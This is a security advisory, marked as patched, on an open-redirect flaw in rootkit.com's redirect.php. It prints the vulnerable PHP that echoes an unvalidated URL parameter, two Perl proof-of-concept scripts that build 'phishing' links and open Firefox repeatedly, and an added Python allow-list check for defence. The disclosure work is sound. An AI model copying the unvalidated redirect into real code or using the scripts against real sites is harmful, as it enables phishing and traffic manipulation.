Rootkit.com : Prone To Redirection and Looping Attacks.

Vulnerability : Patched


zeroknock [at] secniche.org


For Educational Purposes Only!


Redirection Analysis.

Rootkit.com is a well-known rootkit technology site. The site is prone to redirection attacks and looping manipulation. Domain forwarding (URL forwarding) is not only possible directly through the website; it can also be invoked directly by a third party. This makes the website prone to redirection attacks and traffic manipulation. The conditions under which this attack works are quite specific. Before going into detail, let's perform a single test through Google, checking whether any redirect parameter is present in the site's meta content. Look at the picture.

Why does this happen?

There can be two reasons:
1. The most basic reason is that the site does not allow search engine spiders to crawl it: a robots.txt is present and configured with a "Disallow" rule.

2. The second reason can be that no search meta elements are provided in the header tags of the PHP web page.

The reason could be either. But Google results are not always so fruitful; according to Google, no such page exists. Let's see how exactly the redirect (the URL obfuscation) is designed in PHP.

	<?php
	/* Put into the public domain */
	/* Will redirect to the URL given in the "url" query parameter */
	/* The value is echoed without any validation, which is what makes this an open redirect */
	$u = $_GET['url'];
	?>

	<meta http-equiv="refresh" content="0; URL=<?php echo($u); ?>">
	You should be able to be redirected to <a href="<?php echo($u); ?>">
	<?php echo($u); ?></a>
	 
That is exactly how it works. Remember, the HTTP protocol requires that a redirect be sent by itself, without any web page data. As a result, a web programmer who uses a scripting language to redirect the user's browser to another page must ensure that the redirect is the first or only part of the response. In the ASP scripting language, this can be accomplished using response.buffer=true and response.redirect "http://www.example.com". Using PHP, one can use header("Location: http://www.example.com").
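The piece missing from the redirect.php above is any check on where the user may be sent. The following is an added example, not code from this advisory or from rootkit.com, of the server-side allow-list check a redirect endpoint needs before it emits the meta refresh or the Location header; it is written in Python, and the site origin and allowed hosts are assumed values for illustration.

```python
from urllib.parse import urljoin, urlsplit

# Assumed site origin and allow-list for illustration only; a real
# deployment would load these from configuration.
SITE_ORIGIN = "http://www.rootkit.com/"
ALLOWED_HOSTS = {"www.rootkit.com", "rootkit.com"}


def resolve_target(target):
    """Normalise a user-supplied redirect target to an absolute URL.

    Backslashes are treated as slashes (browsers do the same), and relative
    paths are resolved against SITE_ORIGIN so '/x', 'x' and 'http://host/x'
    are all checked through the same parsed form.
    """
    return urljoin(SITE_ORIGIN, target.replace("\\", "/"))


def is_safe_redirect(target, allowed_hosts=ALLOWED_HOSTS):
    """True only if target points at an allow-listed host over http(s).

    Rejects the usual open-redirect bypasses: other hosts, protocol-relative
    '//host', non-http schemes such as javascript:, userinfo tricks like
    'http://www.rootkit.com@evil.example', and CR/LF header injection.
    """
    if not target or any(c in target for c in "\r\n\0"):
        return False
    try:
        parts = urlsplit(resolve_target(target))
    except ValueError:  # malformed netloc, e.g. an unbalanced '['
        return False
    if parts.scheme not in ("http", "https") or "@" in parts.netloc:
        return False
    return (parts.hostname or "").lower() in allowed_hosts


def redirect_location(target, fallback=SITE_ORIGIN):
    """Value for the Location header (or meta refresh): the *resolved* URL,
    never the raw parameter, so shapes such as '///evil.example' reach the
    browser already pinned to SITE_ORIGIN; unsafe targets get the fallback."""
    return resolve_target(target) if is_safe_redirect(target) else fallback


if __name__ == "__main__":
    # Constructed inputs: the advisory's PoC target plus a few bypass shapes.
    for t in ["/index.php", "http://www.slashdot.org", "//www.slashdot.org",
              "javascript:alert(1)", "http://www.rootkit.com@evil.example/"]:
        print(f"{t!r:45} -> {redirect_location(t)}")
```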

At this point we have reached the base, and Google has played its part. Ha! Rootkit.com has this redirection vulnerability, and it can be used to launch looping attacks in the browser. The attacks can be of two kinds:

1. Looping with single domain forwarding.
2. Looping with multiple domain forwarding.

Single domain forwarding means redirecting traffic through the vulnerable link to a single destination. Multiple domain forwarding redirects it to a number of sites. We will demonstrate them one by one.

Upon searching the website directly I found that the vulnerable link is:
http://www.rootkit.com/redirect.php?[Redirected URL]

	#!/usr/bin/perl
	use strict;
	use warnings;

	print "[*] Redirection | Looping Attacks : Rootkit.com\n";
	print "[*] POC By: zeroknock [at] secniche.org\n\n";
	print "[*] Note : Set Firefox In The Default Path As Path=\n\n";
	die "[*] Usage : $0 \n[*] $0 http://www.slashdot.org\n" unless @ARGV == 1;

	# Base of the vulnerable redirect; the target URL is appended as-is.
	my $exploited_url = "http://www.rootkit.com/redirect.php?";
	print "[*] Base URL : $exploited_url \n";
	my $website_hit = $ARGV[0];
	print "[*] Redirected URL : $website_hit\n";
	my $phishing = $exploited_url . $website_hit;
	print "[*] Phishing URL : $phishing\n";

	# List form of system() so the URL is passed to firefox as a single
	# argument and is never interpreted by the shell.
	system("firefox", $phishing);
	print "[*] Firefox Fired!\n";
	print "[*] Redirection Successful!\n";



You can use the same script with a loop that fires a number of child browsers. One can also exploit it through iframe tags. Arrays of target websites to redirect to can also be built and put into a script. First, look at the looping code.

	use strict;
	use warnings;

	die "[*] Usage : $0 http://www.slashdot.org\n" unless @ARGV == 1;

	# Fire nine child browsers, each loaded through the vulnerable redirect.
	for (my $temp = 1; $temp < 10; $temp++)
	{
		my $exploited_url = "http://www.rootkit.com/redirect.php?";
		my $website_hit   = $ARGV[0];
		my $phishing      = $exploited_url . $website_hit;
		system("firefox", $phishing);
	}

Note
This information can be captured in several ways. One way involves URL redirection. Instead of sending the visitor straight to the other site, links on the site can direct to a URL on the original website's domain that automatically redirects to the real target. This added request will leave a trace in the server logs saying exactly which link was followed. This technique is also used by some corporate websites to have a "warning" page that the content is off-site and not necessarily affiliated with the corporation. This technique does bear the downside in the delay of an additional request to the original website's server, even if the redirect is set to fire in 0 seconds. For websites that wish to display a "warning" page before automatically forwarding, the length of time the warning is displayed is an additional delay.



The Redirection Attack Check:

Get To Google.

Get To SecNiche.

Get To Microsoft.

The Analysis is All done!